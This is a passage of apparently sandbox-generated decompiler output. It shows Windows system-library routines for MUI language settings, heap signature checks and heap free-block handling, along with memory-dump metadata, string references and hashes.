                                                                            							E010BF3E0(_t276, _v8, _t167);
                                                                            							_v48 = _t276;
                                                                            							_t277 = E010C1370(_t276, 0x1054e90);
                                                                            							_pop(_t257);
                                                                            							if(_t277 == 0) {
                                                                            								L38:
                                                                            								_t170 = _v48;
                                                                            								if( *_v48 != 0) {
                                                                            									E010BBB40(0,  &_v68, _t170);
                                                                            									if(L010843C0( &_v68,  &_v24) != 0) {
                                                                            										_t280 =  &(_t280[0]);
                                                                            									}
                                                                            								}
                                                                            								if(_t280 == 0) {
                                                                            									_t280 = 0;
                                                                            									L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                                            									_v44 = 0;
                                                                            									_v32 = 0;
                                                                            								} else {
                                                                            									_t280 = 0;
                                                                            								}
                                                                            								_t174 = _v8;
                                                                            								if(_v8 != 0) {
                                                                            									L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                                            								}
                                                                            								_v8 = _t280;
                                                                            								goto L46;
                                                                            							}
                                                                            							_t243 = _v48;
                                                                            							do {
                                                                            								 *_t277 = 0;
                                                                            								_t278 = _t277 + 2;
                                                                            								E010BBB40(_t257,  &_v68, _t243);
                                                                            								if(L010843C0( &_v68,  &_v24) != 0) {
                                                                            									_t280 =  &(_t280[0]);
                                                                            								}
                                                                            								_t243 = _t278;
                                                                            								_t277 = E010C1370(_t278, 0x1054e90);
                                                                            								_pop(_t257);
                                                                            							} while (_t277 != 0);
                                                                            							_v48 = _t243;
                                                                            							_t242 = _v52;
                                                                            							goto L38;
                                                                            						}
                                                                            					}
                                                                            					_t191 = _v12;
                                                                            					_t260 = _v12 + 4;
                                                                            					_v28 = _t260;
                                                                            					if(_t260 == 0) {
                                                                            						_t275 = _t280;
                                                                            						_v16 = _t280;
                                                                            					} else {
                                                                            						_t275 = L01094620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                                            						_t191 = _v12;
                                                                            						_v16 = _t275;
                                                                            					}
                                                                            					if(_t275 == 0) {
                                                                            						_v28 = _t280;
                                                                            						_t280 = 0xc0000017;
                                                                            						goto L47;
                                                                            					} else {
                                                                            						E010BF3E0(_t275, _v8, _t191);
                                                                            						_t285 = _t285 + 0xc;
                                                                            						_v48 = _t275;
                                                                            						_t279 = _t280;
                                                                            						_t281 = E010C1370(_v16, 0x1054e90);
                                                                            						_pop(_t262);
                                                                            						if(_t281 != 0) {
                                                                            							_t244 = _v48;
                                                                            							do {
                                                                            								 *_t281 = 0;
                                                                            								_t282 = _t281 + 2;
                                                                            								E010BBB40(_t262,  &_v68, _t244);
                                                                            								if(L010843C0( &_v68,  &_v24) != 0) {
                                                                            									_t279 =  &(_t279[0]);
                                                                            								}
                                                                            								_t244 = _t282;
                                                                            								_t281 = E010C1370(_t282, 0x1054e90);
                                                                            								_pop(_t262);
                                                                            							} while (_t281 != 0);
                                                                            							_v48 = _t244;
                                                                            							_t242 = _v52;
                                                                            						}
                                                                            						_t201 = _v48;
                                                                            						_t280 = 0;
                                                                            						if( *_v48 != 0) {
                                                                            							E010BBB40(_t262,  &_v68, _t201);
                                                                            							if(L010843C0( &_v68,  &_v24) != 0) {
                                                                            								_t279 =  &(_t279[0]);
                                                                            							}
                                                                            						}
                                                                            						if(_t279 == 0) {
                                                                            							L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                                            							_v28 = _t280;
                                                                            							_v16 = _t280;
                                                                            						}
                                                                            						_t202 = _v8;
                                                                            						if(_v8 != 0) {
                                                                            							L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                                            						}
                                                                            						_v8 = _t280;
                                                                            						goto L28;
                                                                            					}
                                                                            				}
                                                                            				_t214 = _v12;
                                                                            				_t264 = _v12 + 4;
                                                                            				_v40 = _t264;
                                                                            				if(_t264 == 0) {
                                                                            					_v20 = _t280;
                                                                            				} else {
                                                                            					_t236 = L01094620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                                            					_t280 = _t236;
                                                                            					_v20 = _t236;
                                                                            					_t214 = _v12;
                                                                            				}
                                                                            				if(_t280 == 0) {
                                                                            					_t161 = 0;
                                                                            					_t280 = 0xc0000017;
                                                                            					_v40 = 0;
                                                                            					goto L48;
                                                                            				} else {
                                                                            					E010BF3E0(_t280, _v8, _t214);
                                                                            					_t285 = _t285 + 0xc;
                                                                            					_v48 = _t280;
                                                                            					_t283 = E010C1370(_t280, 0x1054e90);
                                                                            					_pop(_t267);
                                                                            					if(_t283 != 0) {
                                                                            						_t245 = _v48;
                                                                            						do {
                                                                            							 *_t283 = 0;
                                                                            							_t284 = _t283 + 2;
                                                                            							E010BBB40(_t267,  &_v68, _t245);
                                                                            							if(L010843C0( &_v68,  &_v24) != 0) {
                                                                            								_t275 = _t275 + 1;
                                                                            							}
                                                                            							_t245 = _t284;
                                                                            							_t283 = E010C1370(_t284, 0x1054e90);
                                                                            							_pop(_t267);
                                                                            						} while (_t283 != 0);
                                                                            						_v48 = _t245;
                                                                            						_t242 = _v52;
                                                                            					}
                                                                            					_t224 = _v48;
                                                                            					_t280 = 0;
                                                                            					if( *_v48 != 0) {
                                                                            						E010BBB40(_t267,  &_v68, _t224);
                                                                            						if(L010843C0( &_v68,  &_v24) != 0) {
                                                                            							_t275 = _t275 + 1;
                                                                            						}
                                                                            					}
                                                                            					if(_t275 == 0) {
                                                                            						L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                                            						_v40 = _t280;
                                                                            						_v20 = _t280;
                                                                            					}
                                                                            					_t225 = _v8;
                                                                            					if(_v8 != 0) {
                                                                            						L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                                            					}
                                                                            					_v8 = _t280;
                                                                            					goto L16;
                                                                            				}
                                                                            			}
                                                                            0x01083fda
                                                                            0x01083fdd
                                                                            0x01084021
                                                                            0x01084021
                                                                            0x01084029
                                                                            0x01084030
                                                                            0x01084044
                                                                            0x01084046
                                                                            0x01084046
                                                                            0x01084044
                                                                            0x01084049
                                                                            0x010d8327
                                                                            0x010d8334
                                                                            0x010d8339
                                                                            0x010d833c
                                                                            0x0108404f
                                                                            0x0108404f
                                                                            0x0108404f
                                                                            0x01084051
                                                                            0x01084056
                                                                            0x01084063
                                                                            0x01084063
                                                                            0x01084068
                                                                            0x00000000
                                                                            0x01084068
                                                                            0x01083fdf
                                                                            0x01083fe2
                                                                            0x01083fe4
                                                                            0x01083fe7
                                                                            0x01083fef
                                                                            0x01084003
                                                                            0x01084005
                                                                            0x01084005
                                                                            0x0108400c
                                                                            0x01084013
                                                                            0x01084016
                                                                            0x01084017
                                                                            0x0108401b
                                                                            0x0108401e
                                                                            0x00000000
                                                                            0x0108401e
                                                                            0x01083fb6
                                                                            0x01083eb1
                                                                            0x01083eb4
                                                                            0x01083eb7
                                                                            0x01083ebc
                                                                            0x010d82a9
                                                                            0x010d82ab
                                                                            0x01083ec2
                                                                            0x01083ed3
                                                                            0x01083ed5
                                                                            0x01083ed8
                                                                            0x01083ed8
                                                                            0x01083edd
                                                                            0x010d82b3
                                                                            0x010d82b6
                                                                            0x00000000
                                                                            0x01083ee3
                                                                            0x01083ee8
                                                                            0x01083eed
                                                                            0x01083ef0
                                                                            0x01083ef3
                                                                            0x01083f02
                                                                            0x01083f05
                                                                            0x01083f08
                                                                            0x010d82c0
                                                                            0x010d82c3
                                                                            0x010d82c5
                                                                            0x010d82c8
                                                                            0x010d82d0
                                                                            0x010d82e4
                                                                            0x010d82e6
                                                                            0x010d82e6
                                                                            0x010d82ed
                                                                            0x010d82f4
                                                                            0x010d82f7
                                                                            0x010d82f8
                                                                            0x010d82fc
                                                                            0x010d82ff
                                                                            0x010d82ff
                                                                            0x01083f0e
                                                                            0x01083f11
                                                                            0x01083f16
                                                                            0x01083f1d
                                                                            0x01083f31
                                                                            0x010d8307
                                                                            0x010d8307
                                                                            0x01083f31
                                                                            0x01083f39
                                                                            0x01083f48
                                                                            0x01083f4d
                                                                            0x01083f50
                                                                            0x01083f50
                                                                            0x01083f53
                                                                            0x01083f58
                                                                            0x01083f65
                                                                            0x01083f65
                                                                            0x01083f6a
                                                                            0x00000000
                                                                            0x01083f6a
                                                                            0x01083edd
                                                                            0x01083dda
                                                                            0x01083ddd
                                                                            0x01083de0
                                                                            0x01083de5
                                                                            0x010d8245
                                                                            0x01083deb
                                                                            0x01083df7
                                                                            0x01083dfc
                                                                            0x01083dfe
                                                                            0x01083e01
                                                                            0x01083e01
                                                                            0x01083e06
                                                                            0x010d824d
                                                                            0x010d824f
                                                                            0x010d8254
                                                                            0x00000000
                                                                            0x01083e0c
                                                                            0x01083e11
                                                                            0x01083e16
                                                                            0x01083e19
                                                                            0x01083e29
                                                                            0x01083e2c
                                                                            0x01083e2f
                                                                            0x010d825c
                                                                            0x010d825f
                                                                            0x010d8261
                                                                            0x010d8264
                                                                            0x010d826c
                                                                            0x010d8280
                                                                            0x010d8282
                                                                            0x010d8282
                                                                            0x010d8289
                                                                            0x010d8290
                                                                            0x010d8293
                                                                            0x010d8294
                                                                            0x010d8298
                                                                            0x010d829b
                                                                            0x010d829b
                                                                            0x01083e35
                                                                            0x01083e38
                                                                            0x01083e3d
                                                                            0x01083e44
                                                                            0x01083e58
                                                                            0x010d82a3
                                                                            0x010d82a3
                                                                            0x01083e58
                                                                            0x01083e60
                                                                            0x01083e6f
                                                                            0x01083e74
                                                                            0x01083e77
                                                                            0x01083e77
                                                                            0x01083e7a
                                                                            0x01083e7f
                                                                            0x01083e8c
                                                                            0x01083e8c
                                                                            0x01083e91
                                                                            0x00000000
                                                                            0x01083e91

                                                                            Strings
                                                                            • Kernel-MUI-Language-Disallowed, xrefs: 01083E97
                                                                            • Kernel-MUI-Language-Allowed, xrefs: 01083DC0
                                                                            • Kernel-MUI-Language-SKU, xrefs: 01083F70
                                                                            • Kernel-MUI-Number-Allowed, xrefs: 01083D8C
                                                                            • WindowsExcludedProcs, xrefs: 01083D6F
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                            • API String ID: 0-258546922
                                                                            • Opcode ID: 65e5b84c7fe870157ed907794135e9dbfe781ac1f2c99cec67041a3f906c1634
                                                                            • Instruction ID: 6e10e397a5254bcd2577a9120fb281be3db6334c1541557e6e222d46a2272880
                                                                            • Opcode Fuzzy Hash: 65e5b84c7fe870157ed907794135e9dbfe781ac1f2c99cec67041a3f906c1634
                                                                            • Instruction Fuzzy Hash: F1F15E72D04219EFCB11EF98C980AEEBBF9FF58650F14406AE985E7251E7749E01CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 29%
                                                                            			E010740E1(void* __edx) {
                                                                            				void* _t19;
                                                                            				void* _t29;
                                                                            
                                                                            				_t28 = _t19;
                                                                            				_t29 = __edx;
                                                                            				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                                                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                            						_push("HEAP: ");
                                                                            						E0107B150();
                                                                            					} else {
                                                                            						E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            					}
                                                                            					E0107B150("Invalid heap signature for heap at %p", _t28);
                                                                            					if(_t29 != 0) {
                                                                            						E0107B150(", passed to %s", _t29);
                                                                            					}
                                                                            					_push("\n");
                                                                            					E0107B150();
                                                                            					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                            						 *0x1166378 = 1;
                                                                            						asm("int3");
                                                                            						 *0x1166378 = 0;
                                                                            					}
                                                                            					return 0;
                                                                            				}
                                                                            				return 1;
                                                                            			}






                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                            • API String ID: 0-188067316
                                                                            • Opcode ID: e98e79dcd88fa80285afa234fd6111b5070915d760e1323d5caaeda0f0341674
                                                                            • Instruction ID: c52cbc0f4bb33ab58db7c4602dc4726e5535d5caf7626b0fefaca611071c9d91
                                                                            • Opcode Fuzzy Hash: e98e79dcd88fa80285afa234fd6111b5070915d760e1323d5caaeda0f0341674
                                                                            • Instruction Fuzzy Hash: F0014732504341AEE3799769F40DFA7BBE4DF81B30F18806DF48D4B641DEA99480C669
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 70%
                                                                            			E0109A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
                                                                            				void* _v5;
                                                                            				signed short _v12;
                                                                            				intOrPtr _v16;
                                                                            				signed int _v20;
                                                                            				signed short _v24;
                                                                            				signed short _v28;
                                                                            				signed int _v32;
                                                                            				signed short _v36;
                                                                            				signed int _v40;
                                                                            				intOrPtr _v44;
                                                                            				intOrPtr _v48;
                                                                            				signed short* _v52;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __ebp;
                                                                            				signed int _t131;
                                                                            				signed char _t134;
                                                                            				signed int _t138;
                                                                            				char _t141;
                                                                            				signed short _t142;
                                                                            				void* _t146;
                                                                            				signed short _t147;
                                                                            				intOrPtr* _t149;
                                                                            				intOrPtr _t156;
                                                                            				signed int _t167;
                                                                            				signed int _t168;
                                                                            				signed short* _t173;
                                                                            				signed short _t174;
                                                                            				intOrPtr* _t182;
                                                                            				signed short _t184;
                                                                            				intOrPtr* _t187;
                                                                            				intOrPtr _t197;
                                                                            				intOrPtr _t206;
                                                                            				intOrPtr _t210;
                                                                            				signed short _t211;
                                                                            				intOrPtr* _t212;
                                                                            				signed short _t214;
                                                                            				signed int _t216;
                                                                            				intOrPtr _t217;
                                                                            				signed char _t225;
                                                                            				signed short _t235;
                                                                            				signed int _t237;
                                                                            				intOrPtr* _t238;
                                                                            				signed int _t242;
                                                                            				unsigned int _t245;
                                                                            				signed int _t251;
                                                                            				intOrPtr* _t252;
                                                                            				signed int _t253;
                                                                            				intOrPtr* _t255;
                                                                            				signed int _t256;
                                                                            				void* _t257;
                                                                            				void* _t260;
                                                                            
                                                                            				_t256 = __edx;
                                                                            				_t206 = __ecx;
                                                                            				_t235 = _a4;
                                                                            				_v44 = __ecx;
                                                                            				_v24 = _t235;
                                                                            				if(_t235 == 0) {
                                                                            					L41:
                                                                            					return _t131;
                                                                            				}
                                                                            				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
                                                                            				if(_t251 == 0) {
                                                                            					__eflags =  *0x1168748 - 1;
                                                                            					if( *0x1168748 >= 1) {
                                                                            						__eflags =  *(__edx + 2) & 0x00000008;
                                                                            						if(( *(__edx + 2) & 0x00000008) == 0) {
                                                                            							_t110 = _t256 + 0xfff; // 0xfe7
                                                                            							__eflags = (_t110 & 0xfffff000) - __edx;
                                                                            							if((_t110 & 0xfffff000) != __edx) {
                                                                            								_t197 =  *[fs:0x30];
                                                                            								__eflags =  *(_t197 + 0xc);
                                                                            								if( *(_t197 + 0xc) == 0) {
                                                                            									_push("HEAP: ");
                                                                            									E0107B150();
                                                                            									_t260 = _t257 + 4;
                                                                            								} else {
                                                                            									E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            									_t260 = _t257 + 8;
                                                                            								}
                                                                            								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
                                                                            								E0107B150();
                                                                            								_t257 = _t260 + 4;
                                                                            								__eflags =  *0x1167bc8;
                                                                            								if(__eflags == 0) {
                                                                            									E01132073(_t206, 1, _t251, __eflags);
                                                                            								}
                                                                            								_t235 = _v24;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				_t134 =  *((intOrPtr*)(_t256 + 6));
                                                                            				if(_t134 == 0) {
                                                                            					_t210 = _t206;
                                                                            					_v48 = _t206;
                                                                            				} else {
                                                                            					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                                                                            					_v48 = _t210;
                                                                            				}
                                                                            				_v5 =  *(_t256 + 2);
                                                                            				do {
                                                                            					if(_t235 > 0xfe00) {
                                                                            						_v12 = 0xfe00;
                                                                            						__eflags = _t235 - 0xfe01;
                                                                            						if(_t235 == 0xfe01) {
                                                                            							_v12 = 0xfdf0;
                                                                            						}
                                                                            						_t138 = 0;
                                                                            					} else {
                                                                            						_v12 = _t235 & 0x0000ffff;
                                                                            						_t138 = _v5;
                                                                            					}
                                                                            					 *(_t256 + 2) = _t138;
                                                                            					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
                                                                            					_t236 =  *((intOrPtr*)(_t210 + 0x18));
                                                                            					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
                                                                            						_t141 = 0;
                                                                            					} else {
                                                                            						_t141 = (_t256 - _t210 >> 0x10) + 1;
                                                                            						_v40 = _t141;
                                                                            						if(_t141 >= 0xfe) {
                                                                            							_push(_t210);
                                                                            							E0113A80D(_t236, _t256, _t210, 0);
                                                                            							_t141 = _v40;
                                                                            						}
                                                                            					}
                                                                            					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
                                                                            					 *((char*)(_t256 + 6)) = _t141;
                                                                            					_t142 = _v12;
                                                                            					 *_t256 = _t142;
                                                                            					 *(_t256 + 3) = 0;
                                                                            					_t211 = _t142 & 0x0000ffff;
                                                                            					 *((char*)(_t256 + 7)) = 0;
                                                                            					_v20 = _t211;
                                                                            					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
                                                                            						_t119 = _t256 + 0x10; // -8
                                                                            						E010CD5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
                                                                            						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
                                                                            						_t211 = _v20;
                                                                            					}
                                                                            					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
                                                                            					if(_t252 == 0) {
                                                                            						L56:
                                                                            						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
                                                                            						_t146 = _t206 + 0xc0;
                                                                            						goto L19;
                                                                            					} else {
                                                                            						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
                                                                            							L15:
                                                                            							_t185 = _t211;
                                                                            							goto L17;
                                                                            						} else {
                                                                            							while(1) {
                                                                            								_t187 =  *_t252;
                                                                            								if(_t187 == 0) {
                                                                            									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
                                                                            									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
                                                                            									goto L17;
                                                                            								}
                                                                            								_t252 = _t187;
                                                                            								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
                                                                            									continue;
                                                                            								}
                                                                            								goto L15;
                                                                            							}
                                                                            							while(1) {
                                                                            								L17:
                                                                            								_t212 = E0109AB40(_t206, _t252, 1, _t185, _t211);
                                                                            								if(_t212 != 0) {
                                                                            									_t146 = _t206 + 0xc0;
                                                                            									break;
                                                                            								}
                                                                            								_t252 =  *_t252;
                                                                            								_t211 = _v20;
                                                                            								_t185 =  *(_t252 + 0x14);
                                                                            							}
                                                                            							L19:
                                                                            							if(_t146 != _t212) {
                                                                            								_t237 =  *(_t206 + 0x4c);
                                                                            								_t253 = _v20;
                                                                            								while(1) {
                                                                            									__eflags = _t237;
                                                                            									if(_t237 == 0) {
                                                                            										_t147 =  *(_t212 - 8) & 0x0000ffff;
                                                                            									} else {
                                                                            										_t184 =  *(_t212 - 8);
                                                                            										_t237 =  *(_t206 + 0x4c);
                                                                            										__eflags = _t184 & _t237;
                                                                            										if((_t184 & _t237) != 0) {
                                                                            											_t184 = _t184 ^  *(_t206 + 0x50);
                                                                            											__eflags = _t184;
                                                                            										}
                                                                            										_t147 = _t184 & 0x0000ffff;
                                                                            									}
                                                                            									__eflags = _t253 - (_t147 & 0x0000ffff);
                                                                            									if(_t253 <= (_t147 & 0x0000ffff)) {
                                                                            										goto L20;
                                                                            									}
                                                                            									_t212 =  *_t212;
                                                                            									__eflags = _t206 + 0xc0 - _t212;
                                                                            									if(_t206 + 0xc0 != _t212) {
                                                                            										continue;
                                                                            									} else {
                                                                            										goto L20;
                                                                            									}
                                                                            									goto L56;
                                                                            								}
                                                                            							}
                                                                            							L20:
                                                                            							_t149 =  *((intOrPtr*)(_t212 + 4));
                                                                            							_t33 = _t256 + 8; // -16
                                                                            							_t238 = _t33;
                                                                            							_t254 =  *_t149;
                                                                            							if( *_t149 != _t212) {
                                                                            								_push(_t212);
                                                                            								E0113A80D(0, _t212, 0, _t254);
                                                                            							} else {
                                                                            								 *_t238 = _t212;
                                                                            								 *((intOrPtr*)(_t238 + 4)) = _t149;
                                                                            								 *_t149 = _t238;
                                                                            								 *((intOrPtr*)(_t212 + 4)) = _t238;
                                                                            							}
                                                                            							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
                                                                            							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
                                                                            							if(_t255 == 0) {
                                                                            								L36:
                                                                            								if( *(_t206 + 0x4c) != 0) {
                                                                            									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
                                                                            									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
                                                                            								}
                                                                            								_t210 = _v48;
                                                                            								_t251 = _v12 & 0x0000ffff;
                                                                            								_t131 = _v20;
                                                                            								_t235 = _v24 - _t131;
                                                                            								_v24 = _t235;
                                                                            								_t256 = _t256 + _t131 * 8;
                                                                            								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
                                                                            									goto L41;
                                                                            								} else {
                                                                            									goto L39;
                                                                            								}
                                                                            							} else {
                                                                            								_t216 =  *_t256 & 0x0000ffff;
                                                                            								_v28 = _t216;
                                                                            								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
                                                                            									L28:
                                                                            									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
                                                                            									_v32 = _t242;
                                                                            									if( *((intOrPtr*)(_t255 + 8)) != 0) {
                                                                            										_t167 = _t242 + _t242;
                                                                            									} else {
                                                                            										_t167 = _t242;
                                                                            									}
                                                                            									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
                                                                            									_t168 = _t167 << 2;
                                                                            									_v40 = _t168;
                                                                            									_t206 = _v44;
                                                                            									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
                                                                            									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
                                                                            										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
                                                                            									}
                                                                            									_t217 = _v16;
                                                                            									if(_t217 != 0) {
                                                                            										_t173 = _t217 - 8;
                                                                            										_v52 = _t173;
                                                                            										_t174 =  *_t173;
                                                                            										__eflags =  *(_t206 + 0x4c);
                                                                            										if( *(_t206 + 0x4c) != 0) {
                                                                            											_t245 =  *(_t206 + 0x50) ^ _t174;
                                                                            											_v36 = _t245;
                                                                            											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
                                                                            											__eflags = _t245 >> 0x18 - _t225;
                                                                            											if(_t245 >> 0x18 != _t225) {
                                                                            												_push(_t225);
                                                                            												E0113A80D(_t206, _v52, 0, 0);
                                                                            											}
                                                                            											_t174 = _v36;
                                                                            											_t217 = _v16;
                                                                            											_t242 = _v32;
                                                                            										}
                                                                            										_v28 = _v28 - (_t174 & 0x0000ffff);
                                                                            										__eflags = _v28;
                                                                            										if(_v28 > 0) {
                                                                            											goto L34;
                                                                            										} else {
                                                                            											goto L33;
                                                                            										}
                                                                            									} else {
                                                                            										L33:
                                                                            										_t58 = _t256 + 8; // -16
                                                                            										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
                                                                            										_t206 = _v44;
                                                                            										_t217 = _v16;
                                                                            										L34:
                                                                            										if(_t217 == 0) {
                                                                            											asm("bts eax, edx");
                                                                            										}
                                                                            										goto L36;
                                                                            									}
                                                                            								} else {
                                                                            									goto L24;
                                                                            								}
                                                                            								while(1) {
                                                                            									L24:
                                                                            									_t182 =  *_t255;
                                                                            									if(_t182 == 0) {
                                                                            										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
                                                                            										__eflags = _t216;
                                                                            										goto L28;
                                                                            									}
                                                                            									_t255 = _t182;
                                                                            									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
                                                                            										continue;
                                                                            									} else {
                                                                            										goto L28;
                                                                            									}
                                                                            								}
                                                                            								goto L28;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					L39:
                                                                            				} while (_t235 != 0);
                                                                            				_t214 = _v12;
                                                                            				_t131 =  *(_t206 + 0x54) ^ _t214;
                                                                            				 *(_t256 + 4) = _t131;
                                                                            				if(_t214 == 0) {
                                                                            					__eflags =  *0x1168748 - 1;
                                                                            					if( *0x1168748 >= 1) {
                                                                            						_t127 = _t256 + 0xfff; // 0xfff
                                                                            						_t131 = _t127 & 0xfffff000;
                                                                            						__eflags = _t131 - _t256;
                                                                            						if(_t131 != _t256) {
                                                                            							_t156 =  *[fs:0x30];
                                                                            							__eflags =  *(_t156 + 0xc);
                                                                            							if( *(_t156 + 0xc) == 0) {
                                                                            								_push("HEAP: ");
                                                                            								E0107B150();
                                                                            							} else {
                                                                            								E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            							}
                                                                            							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
                                                                            							_t131 = E0107B150();
                                                                            							__eflags =  *0x1167bc8;
                                                                            							if(__eflags == 0) {
                                                                            								_t131 = E01132073(_t206, 1, _t251, __eflags);
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				goto L41;
                                                                            			}
                                                                            0x010e2320
                                                                            0x0109ab1b
                                                                            0x0109a89c
                                                                            0x0109a89f
                                                                            0x0109a8a2
                                                                            0x0109a8a2
                                                                            0x0109a8a5
                                                                            0x0109a8af
                                                                            0x0109a8b3
                                                                            0x0109a8b8
                                                                            0x0109aa66
                                                                            0x0109a8be
                                                                            0x0109a8c5
                                                                            0x0109a8c6
                                                                            0x0109a8ce
                                                                            0x010e2328
                                                                            0x010e2332
                                                                            0x010e2337
                                                                            0x010e2337
                                                                            0x0109a8ce
                                                                            0x0109a8d4
                                                                            0x0109a8d8
                                                                            0x0109a8db
                                                                            0x0109a8de
                                                                            0x0109a8e1
                                                                            0x0109a8e5
                                                                            0x0109a8e8
                                                                            0x0109a8f0
                                                                            0x0109a8f3
                                                                            0x010e234c
                                                                            0x010e2350
                                                                            0x010e2355
                                                                            0x010e2359
                                                                            0x010e2359
                                                                            0x0109a8f9
                                                                            0x0109a901
                                                                            0x0109aae4
                                                                            0x0109aae4
                                                                            0x0109aaea
                                                                            0x00000000
                                                                            0x0109a907
                                                                            0x0109a90a
                                                                            0x0109a91d
                                                                            0x0109a91d
                                                                            0x00000000
                                                                            0x0109a910
                                                                            0x0109a910
                                                                            0x0109a910
                                                                            0x0109a914
                                                                            0x0109a924
                                                                            0x0109a924
                                                                            0x0109a924
                                                                            0x0109a924
                                                                            0x0109a916
                                                                            0x0109a91b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0109a91b
                                                                            0x0109a925
                                                                            0x0109a925
                                                                            0x0109a932
                                                                            0x0109a936
                                                                            0x0109a93c
                                                                            0x0109a93c
                                                                            0x0109a93c
                                                                            0x0109ab22
                                                                            0x0109ab24
                                                                            0x0109ab27
                                                                            0x0109ab27
                                                                            0x0109a942
                                                                            0x0109a944
                                                                            0x0109aaba
                                                                            0x0109aabd
                                                                            0x0109aac0
                                                                            0x0109aac0
                                                                            0x0109aac2
                                                                            0x0109ab2f
                                                                            0x0109aac4
                                                                            0x0109aac4
                                                                            0x0109aac7
                                                                            0x0109aaca
                                                                            0x0109aacc
                                                                            0x0109aace
                                                                            0x0109aace
                                                                            0x0109aace
                                                                            0x0109aad1
                                                                            0x0109aad1
                                                                            0x0109aad7
                                                                            0x0109aad9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e2361
                                                                            0x010e2369
                                                                            0x010e236b
                                                                            0x00000000
                                                                            0x010e2371
                                                                            0x00000000
                                                                            0x010e2371
                                                                            0x00000000
                                                                            0x010e236b
                                                                            0x0109aac0
                                                                            0x0109a94a
                                                                            0x0109a94a
                                                                            0x0109a94d
                                                                            0x0109a94d
                                                                            0x0109a950
                                                                            0x0109a954
                                                                            0x010e2376
                                                                            0x010e2380
                                                                            0x0109a95a
                                                                            0x0109a95a
                                                                            0x0109a95c
                                                                            0x0109a95f
                                                                            0x0109a961
                                                                            0x0109a961
                                                                            0x0109a967
                                                                            0x0109a96a
                                                                            0x0109a972
                                                                            0x0109aa02
                                                                            0x0109aa06
